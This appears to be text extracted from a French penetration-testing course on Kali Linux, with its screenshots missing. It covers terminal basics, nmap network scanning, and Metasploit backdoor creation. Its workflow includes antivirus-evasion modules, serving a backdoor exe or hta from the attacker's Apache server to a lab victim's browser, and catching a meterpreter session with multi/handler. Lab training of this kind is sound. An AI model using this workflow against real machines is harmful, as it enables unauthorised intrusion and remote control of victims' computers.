Kali Linux Piratage
Kali Linux Piratage
Kali Linux Piratage
10 millions
d’exemplaires
vendus dans
le monde
WINDOWS 10 : https://telecharger.malekal.com/download/windows-10-20h2-
octobre-2020-x64/#
WINDOWS 7 :https://telecharger.malekal.com/download/iso-windows-7-pro-64-
bits/#
WINDOWS 8 : https://telecharger.malekal.com/download/iso-windows8-64-bits/#
10- Mettez le nom du système que vous désiriez installer et le type : si c’est un
Windows assurez-vous que vous aviez choisi « Microsoft Windows » si vous
voulez-installez un kali linux ou un système linux choisissez le type « linux »et les
« versions Windows (7 ou 8 ou 10) et l’architecture 32 ou 64 bit ».
15- Mettez le nom de la machine qui vous sera demande pour terminer
18- Votre machine est installée, les mêmes pratiques marcheront avec toutes vos
machines Windows virtuels
30- Installation terminer kali est prêt, tapez « continuer » pour terminer
Maintenant que les installations sont terminées nous allons commencer la manipulation
de base de kali linux au chapitre suivant.
Sachez que ces logiciels-là sont des logiciels utilisés dans le cyber sécurité, chaque
logiciel a un rôle bien précis qu’il joue. Exemple : « aircrack-ng permet à un pirate d’avoir
les accès d’un wifi, nmap permet à un pirate de scanner un réseau lorsqu’il réussit à
pénétrer le réseau ».
REMARQUE : chaque outil a son rôle bien précis.
3- QUEL EST L’OUTIL QUI SERA UTILISER DANS CE COURS
L’outil que nous allons utiliser est un outil multi tâche qui est utilisé ou qui est le plus
utilisé chez les pirates de toute catégorie c’est-à-dire « de débutant à expert en sécurité
informatique ».
Cet outil- là se nomme : METASPLOIT. C’est avec cet outil que nous allons travaillez tout
au long de ce livre pratique.
b. Présentation du terminal
Voici comment un terminal de linux s’affiche, le « $ » veut dire que nous n’avons pas
plein autorité sur le terminal donc sur kali linux. Mais nous allons voir comment avoir la
pleine autorité sur kali linux.
Le «pwd »est une commande qui permet de savoir où vous vous trouvez à l’ instant. Si
vous le tapez dans kali, il vous permet de connaitre le chemin où vous vous trouvez dans
kali linux.
d. Commande (2) de kali linux : « ls »
La commande « ls » est une commande de kali qui vous permet de pouvoir afficher les
dossiers ou lister le contenu du chemin où vous vous trouvez.
e. Commande : « cd »
La commande « cd » est une commande de kali linux qui permet à un utilisateur
d’accéder à un dossier, exemple : « cd Bureau a permis à l’utilisateur d’accéder au
dossier Bureau de kali linux ». Aussi la commande « cd + nom du dossier » vous permet
de vous déplacer de votre position à une autre ou d’un dossier à un autre dossier dans
kali.
g. La commande : « cd .. »
La commande « cd .. » vous permet de quitter du dossier dans lequel vous étiez et
revenir dans le dossier précèdent. Exemple : « nous sommes quittés du dossier bureau
dans lequel nous étions avec un « cd .. ».
j. La commande : « cp »
La commande « cp -r + pwd du dossier à copier + pwd du dossier qui reçoit la copie » ou
« cp -r + chemin du dossier à copier + chemin du dossier qui reçoit la copie ». Exemple :
nous avons copié le dossier « Bureau » dans le dossier « Téléchargements ».
k. La commande « clear »
GSIMEL : HACKING PENETRATION SYSTÈME
28
jftsavoir@gmail.com
La commande « clear » vous permets de nettoyer le terminal.
j. La commande : « sudo su ou sudo -s »
La commande « sudo su » vous permet de passer en super utilisateur donc avoir le plein
droit sur votre système kali linux.
NB : après avoir tapez la commande Mettre son mot de passe même si elle est invisible.
comment vous pouvez faire la configuration de votre réseau pour travailler sans
problème avec aisance.
NB : Assurez-vous de mettre toutes vos machines dans le même réseau c’est-à-dire si
« votre kali linux est en réseau nat mettez également toutes vos Windows en réseau
nat ».
PASSONS MAINTENANT AU SCAN DE VULNERABILITE :
a- Cliquez sur démarrer de votre « kali linux et un de vos Windows »
NB : Une fois votre kali linux et votre machine Windows lancés, nous commencerons par
désactiver les pare - feux de Windows activés :
a- Tapez dans recherche « panneau de configuration» puis OK et cliquez sur
SYSTEME ET SECURITE.
Nous allons exploiter un outil de kali linux qui se nomme : NMAP et DB_NMAP
GSIMEL : HACKING PENETRATION SYSTÈME
33
jftsavoir@gmail.com
NMAP est un outil qui permet de scanner un réseau informatique, de trouver des
vulnérabilités ou des portes ouvertes sur les machines connectées au réseau, voir même
donner la faciliter à un pirate de trouver des failles. NMAP est considéré comme un outil
perfectionné en hacking pour le scannage. NB : il y a d’autres outils également très
perfectionnés.
Dans ce cours nous utiliserons pour commencer : NMAP
g- Faites ces configurations avant de commencer sur kali linux et exploiter ses
ressources.
h- NMAP
Pour avoir de l’aide pour mieux explorer un module dans kali, mettez le nom de
l’application et mettez ceci : « -h » donc nous allons mettre « nmap -h pour voir les
différentes options que nous avons pour mieux exploiter nmap et ses ressources »
GSIMEL : HACKING PENETRATION SYSTÈME
34
jftsavoir@gmail.com
Apres avoir mis cette commande vous allez voir une panoplie d’options
devant vous, ce que vous pouvez exploiter seul chez vous pour avoir des
expériences. Nous allons utiliser quelques commandes les plus utilisées en
pentest pour scanner.
Vous comprendrez plus dans la pratique pourquoi il faut connaitre ce petit principe.
Vous devez taper « ifconfig » cette commande est pour connaitre votre adresse IP.
C’est écrit « broadcast : 10.10.1.255 et netmark : 255.255.255.0 » cela correspond à la
classe C donc lors du scan nous allons scanner le réseau avec « 10.10.1.0/24 » nous
allons changer le « 255 » du broadcast en « 0 » et ajouter un « /24 » à la fin.
Cela nous permettra de scanner et de trouver tous ceux qui sont dans le réseau.
Le scanner avec la commande m’a permis de connaitre l’adresse IP d’une cible et le type
de système qu’utilise la cible sans même toucher la machine.
Vous pouvez également mettre cette commande ; elle également va scanner tous ceux
qui se trouvent dans votre réseau et de voir si une machine est lié à une adresse IP. Si
oui elle affichera automatiquement le port ou le port et l’adresse IP de la machine.
Résultat : tous ceux qui sont encadrés en vert sont des adresses IP qui n’ont pas de
machines liées à eux et tous ceux qui sont en rouge sont des adresses IP qui sont liés à
des machines.
Ce sont les mêmes commandes que nmap mais utilisés avec db_nmap donnera le même
résultat.
Résultat
Voici comment vous devez changer ou améliorer les options d’un module avec la
commande « set ». Vous pouvez ajouter dans « rhosts » la plage d’adresse IP pour
scanner tout le réseau.
a- DEFINITION
Un backdoor est également appeler charges utiles ou payload malveillant, ce sont des
éléments de cyberattaques qui provoquent des dégâts « ils permettent à un pirate
d’accéder à des ordinateurs ». Un payload ou backdoor permet aux pirates de
pouvoir faire :
Pour les architectures 32 bits ou x86 nous enlevons seulement le x64 du payload et c’est
tout. Cela vous permet de pirater tous les systèmes en x86 bits.
c- Création de backdoor avec metasploit « msfconsole ».
Définition de metasploit « msfconsole »
Metasploit pen testing tool, est un projet (open source) en relation avec la sécurité
informatique. Son but est de fournir des informations sur les vulnérabilités du système
Modules Exploits
C’est des scripts en Ruby qui nous permettent d’exploiter une vulnérabilité sur une
machine distante. On peut dire que l’exploit nous donne la possibilité de se connecter à
une machine vulnérable sans la toucher.
Modules Payloads
C’est le code exécuté après s’être introduit dans la machine cible, il nous permet de non
seulement pénétrer le système mais également contrôler la machine d’une victime.
Modules auxiliary
C’est des modules utilises pour diverses taches comme scan de port, sniffing, scan
services. Une fois l’exploit et le payload exécutés sur une machine vulnérable a une
faille, on peut faire ce qu’on veut sur le système comme télécharger les données de la
cible, mise en place d’un malware, capture de frappe, etc … .
Modules évasion
Sont des nouveaux modules qui sont conçus pour aider à créer des charges utiles ou
backdoor qui peuvent échapper aux logiciels antivirus (AV) sur le système cible.
Modules encodeurs
Sont de code qui permette d’échapper aux anti-virus.
Modules post
Sont des scripts qui permettent d’exploiter une session après piratage.
GSIMEL : HACKING PENETRATION SYSTÈME
45
jftsavoir@gmail.com
Tous ces modules seront explorés dans ce cours.
Pour trouver le module de backdoor en hta d’évasion, vous devez tapez « search
evasion ». Cela vous donnera une panoplie de backdoor dit indétectable « ce qui n’est
pas totalement vrai ».
Pour utiliser un module nous devons tapez « use + nom du module ou use + indice du
module ».
Passons à la pratique :
ALLEZ SUR VOTRE KALI LINUX, PUIS ALLEZ DANS LE DOSSIER FICHIER
Dans les modules de metasploit nous utiliserons un module très important qui nous
permettra de contrôler et de faire tout le piratage avec metasploit, ce module ce
nomme : « multi/handler ».
NB : Sans cela il est impossible de parler de piratage et cela nécessite que vous reteniez
le port que vous avez utilisé lors de la création de backdoor.
Nous utiliserons le module « multi/handler »
Le module multi/handler permet à un pirate d’écouter le port du backdoor lorsqu’il est
exécuté et de lui envoyer une session.
IMPORTANT A SUIVRE ETAPE PAR ETAPE :
Passons à la configuration de multi/handler avant d’exécuter le backdoor :
Maintenant allons exécuter le backdoor comme la cible le ferais pour simuler une
attaque réel avec piratage qui se fera comme dans un cas réel
ALLONS sur notre machine cible « Windows 7 ou 8 ou 10 » mais :
Il faut désactiver les pare-feu
Mettre la machine dans le même réseau que kali « soit réseau
nat ou accès par pont selon ce que vous avez mis dans kali »
GSIMEL : HACKING PENETRATION SYSTÈME
53
jftsavoir@gmail.com
ALLONS dans le navigateur de la cible :
Une fois dans le navigateur de votre cible, vous allez tapez ceci : « http://ip de kali/nom du
backdoor que vous avez créé avec son extension. »
Exemple : « http://10.10.1.17/backdoorgsi1.exe » voici comment transférer et télécharger
le backdoor dans la machine cible facilement, voilà pourquoi il faut envoyer le backdoor
dans le dossier « var/www/html » et également activer le service apache2 depuis le
début.
Une fois la configuration faite nous allons sur notre machine Windows cible :
Dans le navigateur de la cible puis mettons « http://ip de kali / le nom donner lors de la
configuration du backdoor en hta. » exemple : « http://10.10.1.17/gsi.hta ».
Exécuter Le Backdoor.
Nous venons de pirater avec un autre type de backdoor une machine Windows. Nous
pouvons vérifier la machine avec la commande : « sysinfo ».
Nous venons d’apprendre à pirater une machine avec un backdoor.
Mais savez-vous qu’il existe une méthode de piratage qui ne nécessite pas que la cible
exécute quoi que ce soit et que vous aurez une session meterpreter sur la machine ?
Donc piraté la cible sans avoir besoin de sa collaboration.